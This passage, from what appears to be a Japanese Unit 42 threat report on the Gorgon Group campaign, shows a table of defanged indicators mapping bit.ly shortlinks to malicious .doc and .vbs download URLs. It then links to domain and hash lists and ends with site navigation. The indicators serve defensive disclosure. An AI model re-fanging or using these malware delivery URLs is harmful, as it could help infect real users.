| http://bit\[.\]ly/tt\_loading                        | http://acorn-paper\[.\]com/administrator/components/com\_templates/4.doc       |
| http://bit\[.\]ly/2wzkloading                       | http://panelonetwothree\[.\]ml/zico/doc/zloading.doc                          |
| http://bit\[.\]ly/Loadingans                        | http://onedrivenet\[.\]xyz/work/docnew/14.doc                                 |
| http://bit\[.\]ly/2r9jLcQloading                    | http://panelonetwothree\[.\]ml/zico/doc/zik.doc                               |
| http://bit\[.\]ly/loadingpleasewairrs               | http://stevemike-fireforce\[.\]info/work/dola/2.doc                           |
| http://bit\[.\]ly/2arubabKmpgwP                     | http://panelonetwothree\[.\]ml/iran/uae/done/oc/uae.doc                       |
| http://bit\[.\]ly/2HAwzmN3290293sadjokwwadjoW       | http://stevemike-fireforce\[.\]info/work/doc/12.doc                           |
| http://bit\[.\]ly/loadingasz                        | http://0-day\[.\]us/img/doc/10.doc                                            |
| http://bit\[.\]ly/ntissa2vFamys                     | http://acorn-paper\[.\]com/images/locations/thumbnails/oc/m.doc               |
| http://bit\[.\]ly/2IgzmRxEmasidE9kEjidlE            | http://panelonetwothree\[.\]ga/work/doc/3.doc                                 |
| http://bit\[.\]ly/2JqmuWp                           | http://stemtopx\[.\]com/work/doc/16.doc                                       |
| http://bit\[.\]ly/load242HmFqZ6                     | http://panelonetwothree\[.\]ml/simon/exp/oc/mm.doc                            |
| http://bit\[.\]ly/2L17QGqloading                    | http://panelonetwothree\[.\]ml/zico/doc/doc8/zxloading.doc                    |
| http://bit\[.\]ly/2MarX5t                           | http://stemtopx\[.\]com/work/doc/9.doc                                        |
| http://bit\[.\]ly/Loadingnix                        | http://www.asaigoldenrice\[.\]com/daq/doc/3.doc                               |
| http://bit\[.\]ly/2HyVGGy\_loading                   | http://panelonetwothree\[.\]ml/iran/uae/done/oc1/uae.doc                      |
| http://bit\[.\]ly/2H8euros                          | http://acorn-paper\[.\]com/administrator/components/com\_templates/views/2.doc |
| http://bit\[.\]ly/2I2mUBFstthdhtrhdtyftfyj          | http://stevemikeforce\[.\]com/work/doc/8.doc                                  |
| http://bit\[.\]ly/Loininding                        | http://www.0-day\[.\]us/img/doc/8.doc                                         |
| http://bit\[.\]ly/2F02ZRq                           | http://stevemike-fireforce\[.\]info/work/doc/2.doc                            |
| http://bit\[.\]ly/Loadingpleasewait                 | http://onedrivenet\[.\]xyz/work/docnew/19.doc                                 |
| http://bit\[.\]ly/2jE36KjhvjhgkHJHKLHGFHJ           | http://stevemikeforce\[.\]com/work/doc/3.doc                                  |
| http://bit\[.\]ly/Waitpleasewait                    | http://stevemike-fireforce\[.\]info/work/doc/8.doc                            |
| http://bit\[.\]ly/Loiading                          | http://fast-cargo\[.\]com/images/file/newvbs/doc/1.doc                        |
| http://bit\[.\]ly/Loadingplasewaitsm                | http://stevemike-fireforce\[.\]info/work/doc/3.doc                            |
| http://bit\[.\]ly/2jCTHCNasiudhasdASdy7656basdu     | http://stevemikeforce\[.\]com/work/doc/2.doc                                  |
| http://bit\[.\]ly/loadingpleaswaitrr                | http://stevemike-fireforce\[.\]info/work/doc/4.doc                            |
| http://bit\[.\]ly/Loadingnsi                        | http://onedrivenet\[.\]xyz/work/docnew/2.doc                                  |
| http://bit\[.\]ly/2JRUNKh                           | http://www.stemtopx\[.\]com/work/newdoc/3.doc                                 |
| http://bit\[.\]ly/2Hload25YdU19                     | http://panelonetwothree\[.\]ml/simon/exp/oc/25/m25.doc                        |
| http://bit\[.\]ly/2lording                          | http://fast-cargo\[.\]com/images/file/vb/VBS/doc/8.doc                        |
| http://bit\[.\]ly/2M9lLL6                           | http://stemtopx\[.\]com/work/doc/15.doc                                       |
| http://bit\[.\]ly/Loggeding                         | http://fast-cargo\[.\]com/images/file/newvbs/doc/4.doc                        |
| http://bit\[.\]ly/Loadingwaitplez                   | http://stevemike-fireforce\[.\]info/work/doc/10.doc                           |
| http://bit\[.\]ly/ASDj23234j4oDj3234Sdmk            | http://stevemike-fireforce\[.\]info/work/doc/5.doc                            |
| http://bit\[.\]ly/2JloadingspWgLs2                  | http://acorn-paper\[.\]com/components/com\_content/models/oc/s.doc             |
| http://bit\[.\]ly/Loadingpleasewaitnn               | http://stevemike-fireforce\[.\]info/work/dola/4.doc                           |
| http://bit\[.\]ly/2sPe3wZrdtrdytd                   | http://stemtopx\[.\]com/work/doc/2.doc                                        |
| http://bit\[.\]ly/LAdooing                          | http://onedrivenet\[.\]xyz/work/docnew/6.doc                                  |
| http://bit\[.\]ly/LoadIng                           | http://guelphupholstery\[.\]com/images/yupsia/doc/62.doc                      |
| http://bit\[.\]ly/2JnMVQz                           | http://stemtopx\[.\]com/work/doc/14.doc                                       |
| http://bit\[.\]ly/DocumentIsLoadingPleasewait       | http://stemtopx\[.\]com/work/i/2.doc                                          |
| http://bit\[.\]ly/2HVD1Bh                           | http://fast-cargo\[.\]com/images/file/vb/VBS/doc/4.doc                        |
| http://bit\[.\]ly/2uoqexc                           | http://zupaservices\[.\]info/doc/1.doc                                        |
| http://bit\[.\]ly/2vXgnqdASdj2929iqwSdu9iw9i        | http://stevemike-fireforce\[.\]info/work/doc/13.doc                           |
| http://bit\[.\]ly/4\_loadingEwHlnA                   | http://diamondfoxpanel\[.\]ml/doc/4.doc                                       |
| http://bit\[.\]ly/lLoadingl9                        | http://fast-cargo\[.\]com/images/file/vb/VBS/doc/9.doc                        |
| http://bit\[.\]ly/LlLoadinG                         | https://www.0-day\[.\]us/img/doc/2.doc                                        |
| http://bit\[.\]ly/2kTPwmFdrwfdtsfdfyr               | http://stemtopx\[.\]com/work/doc/1.doc                                        |
| http://bit\[.\]ly/2G34tww                           | http://fast-cargo\[.\]com/old/images/file/vb/VBS/smon/doc/testa.doc           |
| http://bit\[.\]ly/2HvQBir                           | http://stevemike-fireforce\[.\]info/work/dola/3.doc                           |
| http://bit\[.\]ly/golden\_uae                        | http://fast-cargo\[.\]com/old/images/file/vb/VBS/smon/doc/xchange.doc         |
| http://bit\[.\]ly/pele2HROHp1                       | http://acorn-paper\[.\]com/images/locations/thumbnails/z/oc/z.doc             |
| http://bit\[.\]ly/2rlqLDBMSloading                  | http://panelonetwothree\[.\]ml/iran/uae/done/oc2/uae.doc                      |
| http://bit\[.\]ly/2JDUVMC                           | http://stemtopx\[.\]com/work/doc/11.doc                                       |
| http://bit\[.\]ly/2K1GYVgtyfctftfTFTYFUFtufutfu     | http://stevemikeforce\[.\]com/work/doc/11.doc                                 |
| http://bit\[.\]ly/2Jr4dby                           | http://stemtopx\[.\]com/work/doc/18.doc                                       |
| http://bit\[.\]ly/2M9I8z4                           | http://stemtopx\[.\]com/work/newdoc/2.doc                                     |
| http://bit\[.\]ly/ASD8239ASdmkWi38AS                | http://stevemike-fireforce\[.\]info/work/dola/4.doc                           |
| http://bit\[.\]ly/LoadingPelasewaits                | http://stevemike-fireforce\[.\]info/work/docnew/2.doc                         |
| http://bit\[.\]ly/2JnNtG7                           | http://stemtopx\[.\]com/work/doc/17.doc                                       |
| http://bit\[.\]ly/shawclk2HZJXOr                    | http://panelonetwothree\[.\]ml/simon/exp/25exp/26/doc/final/26.doc            |
| http://bit\[.\]ly/loadijgng                         | http://onedrivenet\[.\]xyz/work/docnew/9.doc                                  |
| http://bit\[.\]ly/PleaseWaitLoading                 | http://www.asaigoldenrice\[.\]com/daq/doc/7.doc                               |
| http://bit\[.\]ly/Loadinger                         | http://onedrivenet\[.\]xyz/work/docnew/1.doc                                  |
| http://bit\[.\]ly/Workingwait                       | http://onedrivenet\[.\]xyz/work/docnew/21.doc                                 |
| http://bit\[.\]ly/Loadingplzwait                    | http://www.asaigoldenrice\[.\]com/daq/doc/5.doc                               |
| http://bit\[.\]ly/2HuOFBQ                           | http://stemtopx\[.\]com/work/doc/5.doc                                        |
| http://bit\[.\]ly/LoadingPleasewait1                | http://onedrivenet\[.\]xyz/work/docnew/20.doc                                 |
| http://bit\[.\]ly/LlOrRinding                       | http://www.0-day\[.\]us/img/doc/11.doc                                        |
| http://bit\[.\]ly/Loadingwaitplzz                   | http://onedrivenet\[.\]xyz/work/docnew/16.doc                                 |
| http://bit\[.\]ly/2HWdrzTgfufuyfkCTYTDFYTgtfutf     | http://stevemikeforce\[.\]com/work/doc/12.doc                                 |
| http://bit\[.\]ly/2KHEnRKxestrhdyhdDTDRDTRthdydy    | http://stevemikeforce\[.\]com/work/doc/10.doc                                 |
| http://bit\[.\]ly/unkwonas                          | http://asaigoldenrice\[.\]com/sim/new.vbs                                     |
| http://bit\[.\]ly/Laodiingpleasewait                | http://onedrivenet\[.\]xyz/work/docnew/13.doc                                 |
| http://bit\[.\]ly/wordxchange                       | http://asaigoldenrice\[.\]com/sim/doc/kalu.doc                                |
| http://bit\[.\]ly/Loadsinfpleasewait                | http://onedrivenet\[.\]xyz/work/docnew/30.docx                                |
| http://bit\[.\]ly/Loardsing                         | http://www.0-day\[.\]us/img/doc/7.doc                                         |
| http://bit\[.\]ly/2ImbyrQ                           | http://acorn-paper\[.\]com/administrator/6.doc                                |
| http://bit\[.\]ly/LoadingPleasewait                 | http://onedrivenet\[.\]xyz/work/docnew/20.doc                                 |

### ドメイン

このキャンペーン全体でマルウェアの使用が確認されたドメインのリストについては、[以下のファイル](https://github.com/pan-unit42/iocs/blob/master/gorgon/domains.txt)を参照してください。

### ハッシュ

このキャンペーンで確認されたマルウェアのすべてのハッシュのリストについては、[以下のファイル](https://github.com/pan-unit42/iocs/blob/master/gorgon/hashes.csv)を参照してください。
トップに戻る

### タグ

* [CVE-2017-0199](https://unit42.paloaltonetworks.com/ja/tag/cve-2017-0199-ja/ "CVE-2017-0199")
* [Gorgon Group](https://unit42.paloaltonetworks.com/ja/tag/gorgon-group-ja/ "Gorgon Group")
* [Subaat](https://unit42.paloaltonetworks.com/ja/tag/subaat-ja/ "Subaat")  
  [Threat Research Center](https://unit42.paloaltonetworks.com/ja/ "Threat Research") [次ページ:ロシアおよび韓国に対する攻撃で使用されたBisonalマルウェア](https://unit42.paloaltonetworks.com/ja/unit42-bisonal-malware-used-attacks-russia-south-korea/ "ロシアおよび韓国に対する攻撃で使用されたBisonalマルウェア")

### 目次

* 

### 関連記事

* [『攻撃者のプレイブック』に新たに 11 グループを追加](https://unit42.paloaltonetworks.com/ja/unveiling-11-new-adversary-playbooks/ "article - table of contents")

## 関連項目 リソース

![Pictorial representation of ChainDrop, a self-propagating npm worm. An artistic depiction of a digital workspace featuring an open laptop with a red virus on the screen.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/08/03_Malware_Category_1920x900-7-786x368.jpg)  
[![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)主なサイバー脅威](https://unit42.paloaltonetworks.com/ja/category/top-cyberthreats-ja/) 2026年8月6日 [#### ChainDropの脅威の概要:自己増殖型npmワームの内部](https://unit42.paloaltonetworks.com/ja/chaindrop-npm-worm-analysis/)

* [Blockchain](https://unit42.paloaltonetworks.com/ja/tag/blockchain-ja/ "blockchain")

* [ChainDrop](https://unit42.paloaltonetworks.com/ja/tag/chaindrop/ "ChainDrop")

* [Claude code](https://unit42.paloaltonetworks.com/ja/tag/claude-code/ "Claude code")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/chaindrop-npm-worm-analysis/ "ChainDropの脅威の概要:自己増殖型npmワームの内部")  
  ![Pictorial representation of the npm packages supply chain attack. Screen displaying code with a prominent alert symbol and the words 'VIRUS DETECTED' highlighted in red.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/04/05_Malware_Category_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)主なサイバー脅威](https://unit42.paloaltonetworks.com/ja/category/top-cyberthreats-ja/) 2026年6月2日 [#### npmの脅威の状況: アタックサーフェスと緩和策(6月2日更新)](https://unit42.paloaltonetworks.com/ja/monitoring-npm-supply-chain-attacks/)

* [Credential Harvesting](https://unit42.paloaltonetworks.com/ja/tag/credential-harvesting-ja/ "Credential Harvesting")

* [GitHub](https://unit42.paloaltonetworks.com/ja/tag/github-ja/ "GitHub")

* [Npm packages](https://unit42.paloaltonetworks.com/ja/tag/npm-packages/ "npm packages")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/monitoring-npm-supply-chain-attacks/ "npmの脅威の状況: アタックサーフェスと緩和策(6月2日更新)")  
  ![Pictorial representation of Screening Serpens. An illustrated blue snake is highlighted by a red circle against a night sky. The constellation serpens.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/05/Serpens-Iran-A-1920x900-2-786x368.png)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/threat-actor-groups.svg)脅威アクター グループ](https://unit42.paloaltonetworks.com/ja/category/threat-actor-groups-ja/) 2026年5月22日 [#### イランAPT Screening Serpensによる2026年スパイ キャンペーンの追跡](https://unit42.paloaltonetworks.com/ja/tracking-iran-apt-screening-serpens/)

* [Advanced Persistent Threat](https://unit42.paloaltonetworks.com/ja/tag/advanced-persistent-threat-ja/ "Advanced Persistent Threat")

* [AppDomainManager](https://unit42.paloaltonetworks.com/ja/tag/appdomainmanager/ "AppDomainManager")

* [DLL Sideloading](https://unit42.paloaltonetworks.com/ja/tag/dll-sideloading-ja/ "DLL Sideloading")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/tracking-iran-apt-screening-serpens/ "イランAPT Screening Serpensによる2026年スパイ キャンペーンの追跡")  
  ![Pictorial representation of a severe Linux vulnerability. Close-up of a woman wearing glasses and focusing intently on a computer screen.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/05/05_Vulnerabilities_1920x900-2-1-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)主なサイバー脅威](https://unit42.paloaltonetworks.com/ja/category/top-cyberthreats-ja/) 2026年5月5日 [#### Copy Fail:ここ数年で最も深刻なLinuxの脅威について必要な知識](https://unit42.paloaltonetworks.com/ja/cve-2026-31431-copy-fail/)

* [Containers](https://unit42.paloaltonetworks.com/ja/tag/containers-ja/ "Containers")

* [CVE-2026-31431](https://unit42.paloaltonetworks.com/ja/tag/cve-2026-31431/ "CVE-2026-31431")

* [Kubernetes](https://unit42.paloaltonetworks.com/ja/tag/kubernetes-ja/ "Kubernetes")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/cve-2026-31431-copy-fail/ "Copy Fail:ここ数年で最も深刻なLinuxの脅威について必要な知識")  
  ![Pictorial representation of Iran cyber attacks. Close-up of a person wearing glasses, with computer code reflected in the lenses.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/03/12_Security-Technology_Category_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)主なサイバー脅威](https://unit42.paloaltonetworks.com/ja/category/top-cyberthreats-ja/) 2026年4月17日 [#### 脅威情報: 2026年イランに関するサイバー リスクの激化(4月17日更新)](https://unit42.paloaltonetworks.com/ja/iranian-cyberattacks-2026/)

* [APK](https://unit42.paloaltonetworks.com/ja/tag/apk-ja/ "APK")

* [DDoS attacks](https://unit42.paloaltonetworks.com/ja/tag/ddos-attacks-ja/ "DDoS attacks")

* [GenAI](https://unit42.paloaltonetworks.com/ja/tag/genai-ja/ "GenAI")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/iranian-cyberattacks-2026/ "脅威情報: 2026年イランに関するサイバー リスクの激化(4月17日更新)")  
  ![Pictorial representation of the supply chain attack compromising Axios. A giant eye made of glowing binary code.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/04/02_Security-Technology_Category_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)主なサイバー脅威](https://unit42.paloaltonetworks.com/ja/category/top-cyberthreats-ja/) 2026年4月1日 [#### 脅威概要:Axiosサプライ チェーン攻撃で広範に及ぶ影響](https://unit42.paloaltonetworks.com/ja/axios-supply-chain-attack/)

* [API attacks](https://unit42.paloaltonetworks.com/ja/tag/api-attacks-ja/ "API attacks")

* [JavaScript](https://unit42.paloaltonetworks.com/ja/tag/javascript-ja/ "JavaScript")

* [Powershell](https://unit42.paloaltonetworks.com/ja/tag/powershell-ja/ "Powershell")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/axios-supply-chain-attack/ "脅威概要:Axiosサプライ チェーン攻撃で広範に及ぶ影響")  
  ![Pictorial representation of TeamPCP. Glowing code on a screen where several word such as Crime, Hackers, and Security are highlighted in a contrasting color.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/03/03_Cybercrime_Category_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)主なサイバー脅威](https://unit42.paloaltonetworks.com/ja/category/top-cyberthreats-ja/) 2026年3月31日 [#### プロテクターを武器として利用する:セキュリティ インフラにおけるTeamPCPの多段階サプライ チェーン攻撃](https://unit42.paloaltonetworks.com/ja/teampcp-supply-chain-attacks/)

* [CVE-2025-55182](https://unit42.paloaltonetworks.com/ja/tag/cve-2025-55182-ja/ "CVE-2025-55182")

* [GitHub](https://unit42.paloaltonetworks.com/ja/tag/github-ja/ "GitHub")

* [Infostealer](https://unit42.paloaltonetworks.com/ja/tag/infostealer-ja/ "Infostealer")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/teampcp-supply-chain-attacks/ "プロテクターを武器として利用する:セキュリティ インフラにおけるTeamPCPの多段階サプライ チェーン攻撃")  
  ![Pictorial representation of phishing campaign. A blurred image focusing on a person typing on a laptop with lines of code visible on the screen, illuminated in blue and red lights, suggestive of intense coding or cyber activities.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/03/06_Malware_Category_1920x900-3-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)脅威リサーチ](https://unit42.paloaltonetworks.com/ja/category/threat-research-ja/) 2026年3月24日 [#### 脅威情報: パロアルトネットワークスの人材獲得チームになりすました採用スキーム](https://unit42.paloaltonetworks.com/ja/phishing-attackers-pose-as-panw-recruiters/)

* [Email scam](https://unit42.paloaltonetworks.com/ja/tag/email-scam/ "email scam")

* [Lure](https://unit42.paloaltonetworks.com/ja/tag/lure/ "lure")

* [Phishing](https://unit42.paloaltonetworks.com/ja/tag/phishing-ja/ "phishing")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/phishing-attackers-pose-as-panw-recruiters/ "脅威情報: パロアルトネットワークスの人材獲得チームになりすました採用スキーム")  
  ![Pictorial representation of BeyondTrust vulnerability CVE-2026-1731. Digital art depicting a stylized mountain range with vibrant blue and red hues. The peaks are accentuated by glowing particles and an abstract, starry backdrop, creating a futuristic landscape.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/02/14_Overview_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)主なサイバー脅威](https://unit42.paloaltonetworks.com/ja/category/top-cyberthreats-ja/) 2026年2月19日 [#### BeyondTrustの深刻な脆弱性（CVE-2026-1731）の悪用においてVShellおよびSparkRATを確認](https://unit42.paloaltonetworks.com/ja/beyondtrust-cve-2026-1731/)

* [Bash](https://unit42.paloaltonetworks.com/ja/tag/bash-ja/ "bash")

* [CVE-2026-1731](https://unit42.paloaltonetworks.com/ja/tag/cve-2026-1731/ "CVE-2026-1731")

* [Powershell](https://unit42.paloaltonetworks.com/ja/tag/powershell-ja/ "Powershell")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/beyondtrust-cve-2026-1731/ "BeyondTrustの深刻な脆弱性（CVE-2026-1731）の悪用においてVShellおよびSparkRATを確認")  
  ![](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/02/AdobeStock_1020436911-786x440.jpeg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)主なサイバー脅威](https://unit42.paloaltonetworks.com/ja/category/top-cyberthreats-ja/) 2026年2月17日 [#### 野放し状態で悪用されているIvanti EPMMの深刻な脆弱性](https://unit42.paloaltonetworks.com/ja/ivanti-cve-2026-1281-cve-2026-1340/)

* [CVE-2026-1281](https://unit42.paloaltonetworks.com/ja/tag/cve-2026-1281/ "CVE-2026-1281")

* [CVE-2026-1340](https://unit42.paloaltonetworks.com/ja/tag/cve-2026-1340/ "CVE-2026-1340")

* [Ivanti](https://unit42.paloaltonetworks.com/ja/tag/ivanti-ja/ "Ivanti")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/ivanti-cve-2026-1281-cve-2026-1340/ "野放し状態で悪用されているIvanti EPMMの深刻な脆弱性")

* ![Slider arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/slider-arrow-left.svg)

* ![Slider arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/slider-arrow-left.svg)  
  ![Close button](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/close-modal.svg) ![Enlarged Image]()  
  ![Newsletter](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/04/Unit-42_get-updates-banner.png)  
  ![UNIT 42 Small Logo](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/palo-alto-logo-small.svg) Unit 42 からの最新情報を取得

## 進化する脅威の状況を常に先取り

メール アドレス

本フォームを送信することにより、[利用規約](https://www.paloaltonetworks.jp/legal-notices/terms-of-use)に同意し、[プライバシー ポリシー](https://www.paloaltonetworks.jp/legal-notices/privacy)を承認したことになります。

本サイトは reCAPTCHA で保護されており、Googleの[プライバシー ポリシー](https://policies.google.com/privacy) と[サービス利用規約](https://policies.google.com/terms)が適用されます。

Invalid captcha!
サブスクライブ ![Right Arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/right-arrow.svg) ![loader](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-loader.svg)  
{#footer} 製品とサービス

* [AI利用ネットワーク セキュリティ プラットフォーム](https://www.paloaltonetworks.jp/network-security)

* [AIのセキュア バイ デザイン](https://www.paloaltonetworks.jp/precision-ai-security/secure-ai-by-design)

* [Prisma AIRS](https://www.paloaltonetworks.jp/prisma/prisma-ai-runtime-security)

* [AI Access Security](https://www.paloaltonetworks.jp/sase/ai-access-security)

* [クラウド提供型セキュリティ サービス](https://www.paloaltonetworks.jp/network-security/security-subscriptions)

* [Advanced Threat Prevention](https://www.paloaltonetworks.jp/network-security/advanced-threat-prevention)

* [Advanced URL Filtering](https://www.paloaltonetworks.jp/network-security/advanced-url-filtering)

* [Advanced WildFire](https://www.paloaltonetworks.jp/network-security/advanced-wildfire)

* [Advanced DNS Security](https://www.paloaltonetworks.jp/network-security/advanced-dns-security)

* [Enterprise Data Loss Prevention](https://www.paloaltonetworks.jp/sase/enterprise-data-loss-prevention)

* [Enterprise IoT Security](https://www.paloaltonetworks.jp/content/pan/ja_JP/network-security/enterprise-iot-security)

* [Medical IoT Security](https://www.paloaltonetworks.jp/network-security/medical-device-security)

* [Industrial OT Security](https://www.paloaltonetworks.jp/content/pan/ja_JP/network-security/industrial-ot-security)

* [SaaS Security](https://www.paloaltonetworks.jp/sase/saas-security)

* [次世代ファイアウォール](https://www.paloaltonetworks.jp/network-security/next-generation-firewall)

* [ハードウェア ファイアウォール](https://www.paloaltonetworks.jp/network-security/hardware-firewall-innovations)

* [ソフトウェア ファイアウォール](https://www.paloaltonetworks.jp/network-security/software-firewalls)

* [Strata Cloud Manager](https://www.paloaltonetworks.jp/network-security/strata-cloud-manager)

* [SD-WAN for NGFW](https://www.paloaltonetworks.jp/network-security/sd-wan-subscription)

* [PAN-OS](https://www.paloaltonetworks.jp/network-security/pan-os)

* [Panorama](https://www.paloaltonetworks.jp/network-security/panorama)

* [セキュア アクセス サービス エッジ](https://www.paloaltonetworks.jp/sase)

* [Prisma SASE](https://www.paloaltonetworks.jp/sase)

* [App Acceleration](https://www.paloaltonetworks.jp/sase/app-acceleration)

* [自律型デジタルエクスペリエンス管理](https://www.paloaltonetworks.jp/sase/adem)

* [Enterprise DLP](https://www.paloaltonetworks.jp/sase/enterprise-data-loss-prevention)

* [Prisma Access](https://www.paloaltonetworks.jp/sase/access)

* [Prisma Browser](https://www.paloaltonetworks.jp/sase/prisma-browser)

* [Prisma SD-WAN](https://www.paloaltonetworks.jp/sase/sd-wan)

* [リモート ブラウザ分離](https://www.paloaltonetworks.jp/sase/remote-browser-isolation)

* [SaaS Security](https://www.paloaltonetworks.jp/sase/saas-security)

* [AI駆動型セキュリティ運用プラットフォーム](https://www.paloaltonetworks.jp/cortex)

* [Cloud Security](https://www.paloaltonetworks.jp/cortex/cloud)

* [Cortex Cloud](https://www.paloaltonetworks.jp/cortex/cloud)

* [Application Security](https://www.paloaltonetworks.jp/cortex/cloud/application-security)

* [Cloud Posture Security](https://www.paloaltonetworks.jp/cortex/cloud/cloud-posture-security)

* [Cloud Runtime Security](https://www.paloaltonetworks.jp/cortex/cloud/runtime-security)

* [Prisma Cloud](https://www.paloaltonetworks.jp/prisma/cloud)

* [AI駆動型SOC](https://www.paloaltonetworks.jp/cortex)

* [Cortex XSIAM](https://www.paloaltonetworks.jp/cortex/cortex-xsiam)

* [Cortex XDR](https://www.paloaltonetworks.jp/cortex/cortex-xdr)

* [Cortex XSOAR](https://www.paloaltonetworks.jp/cortex/cortex-xsoar)

* [Cortex Xpanse](https://www.paloaltonetworks.jp/cortex/cortex-xpanse)

* [Unit 42マネージド ディテクション\&レスポンス](https://www.paloaltonetworks.jp/cortex/managed-detection-and-response)

* [マネージドXSIAM](https://www.paloaltonetworks.jp/cortex/managed-xsiam)

* [次世代のアイデンティティ セキュリティ](https://www.paloaltonetworks.jp/idira)

* [特権アクセス管理](https://www.paloaltonetworks.jp/idira/human/privileged-access-management)

* [アイデンティティ管理とアクセス管理](https://www.paloaltonetworks.jp/idira/human/identity-and-access-management)

* [Endpoint Privilege Manager](https://www.paloaltonetworks.jp/idira/human/endpoint-privilege-manager)

* [アイデンティティ ガバナンス](https://www.paloaltonetworks.jp/idira/human/identity-governance)

* [従業員パスワード管理](https://www.paloaltonetworks.jp/idira/human/workforce-password-management)

* [エージェンティック アイデンティティ](https://www.paloaltonetworks.jp/idira/agentic)

* [シークレット管理](https://www.paloaltonetworks.jp/idira/machine/secrets-management)

* [統合型シークレット ガバナンス](https://www.paloaltonetworks.jp/idira/machine/unified-secrets-governance)

* [アプリケーションの認証情報配信](https://www.paloaltonetworks.jp/idira/machine/application-credentials-delivery)

* [ベンダーの特権アクセス](https://www.paloaltonetworks.jp/idira/human/vendor-privileged-access)

* [脅威インテリジェンス\&インシデント レスポンス サービス](https://www.paloaltonetworks.jp/unit42)

* [予防評価](https://www.paloaltonetworks.jp/unit42/assess)

* [インシデント レスポンス](https://www.paloaltonetworks.jp/unit42/respond)

* [セキュリティ戦略を変革](https://www.paloaltonetworks.jp/unit42/transform)

* [脅威インテリジェンスについて](https://www.paloaltonetworks.jp/unit42/threat-intelligence-partners)  
  会社名

* [パロアルトネットワークスについて](https://www.paloaltonetworks.jp/about-us)

* [採用情報](https://jobs.paloaltonetworks.com/en/)

* [お問合せ](https://www.paloaltonetworks.jp/company/contact-sales)

* [企業責任](https://www.paloaltonetworks.com/about-us/corporate-responsibility)

* [お客様向け](https://www.paloaltonetworks.jp/customers)

* [IR](https://investors.paloaltonetworks.com/)

* [拠点](https://www.paloaltonetworks.com/about-us/locations)

* [ニュースルーム](https://www.paloaltonetworks.jp/company/newsroom)  
  人気のあるリンク

* [ブログ](https://www.paloaltonetworks.com/blog/?lang=ja)

* [コミュニティ](https://www.paloaltonetworks.com/communities)

* [コンテンツライブラリ](https://www.paloaltonetworks.jp/resources)

* [Cyberpedia](https://www.paloaltonetworks.jp/cyberpedia)

* [イベントセンター](https://events.paloaltonetworks.com/)

* [電子メール設定の管理](https://start.paloaltonetworks.com/preference-center)

* [製品A〜Z](https://www.paloaltonetworks.jp/products/products-a-z)

* [製品認証](https://www.paloaltonetworks.com/legal-notices/trust-center/compliance)

* [脆弱性の報告](https://www.paloaltonetworks.com/security-disclosure)

* [サイトマップ](https://www.paloaltonetworks.jp/sitemap)

* [テクニカル ドキュメント](https://docs.paloaltonetworks.com/)

* [Unit 42](https://unit42.paloaltonetworks.jp/)

